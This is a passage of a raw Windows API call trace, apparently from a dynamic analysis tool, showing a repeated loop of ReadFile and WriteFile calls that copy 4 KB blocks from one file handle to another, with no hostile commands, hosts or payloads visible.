[0098.411] SetLastError (dwErrCode=0x0) [0098.411] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.411] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.411] SetLastError (dwErrCode=0x0) [0098.411] SetLastError (dwErrCode=0x0) [0098.411] SetLastError (dwErrCode=0x0) [0098.411] SetLastError (dwErrCode=0x0) [0098.411] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.411] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.412] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] SetLastError (dwErrCode=0x0) [0098.412] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.412] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.413] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.413] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.413] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.414] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.414] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] SetLastError (dwErrCode=0x0) [0098.414] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.414] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.415] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] SetLastError (dwErrCode=0x0) [0098.415] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.415] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.416] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] SetLastError (dwErrCode=0x0) [0098.416] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.416] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.417] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.417] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.417] SetLastError (dwErrCode=0x0) [0098.418] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.418] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.418] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] SetLastError (dwErrCode=0x0) [0098.418] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.418] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.419] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.419] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.419] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.419] SetLastError (dwErrCode=0x0) [0098.419] SetLastError (dwErrCode=0x0) [0098.420] SetLastError (dwErrCode=0x0) [0098.420] SetLastError (dwErrCode=0x0) [0098.420] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.420] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.420] SetLastError (dwErrCode=0x0) [0098.420] SetLastError (dwErrCode=0x0) [0098.420] SetLastError (dwErrCode=0x0) [0098.420] SetLastError (dwErrCode=0x0) [0098.420] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.421] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.421] SetLastError (dwErrCode=0x0) [0098.421] SetLastError (dwErrCode=0x0) [0098.421] SetLastError (dwErrCode=0x0) [0098.421] SetLastError (dwErrCode=0x0) [0098.421] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.421] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.421] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.422] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.422] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] SetLastError (dwErrCode=0x0) [0098.422] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.423] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.423] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] SetLastError (dwErrCode=0x0) [0098.423] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.423] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.424] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] SetLastError (dwErrCode=0x0) [0098.424] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.424] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.425] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.425] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.425] SetLastError (dwErrCode=0x0) [0098.426] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.426] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.426] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] SetLastError (dwErrCode=0x0) [0098.426] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.426] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.427] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.427] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.427] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.427] SetLastError (dwErrCode=0x0) [0098.427] SetLastError (dwErrCode=0x0) [0098.428] SetLastError (dwErrCode=0x0) [0098.428] SetLastError (dwErrCode=0x0) [0098.428] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.428] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.428] SetLastError (dwErrCode=0x0) [0098.428] SetLastError (dwErrCode=0x0) [0098.428] SetLastError (dwErrCode=0x0) [0098.428] SetLastError (dwErrCode=0x0) [0098.428] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.428] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.428] SetLastError (dwErrCode=0x0) [0098.428] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.428] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 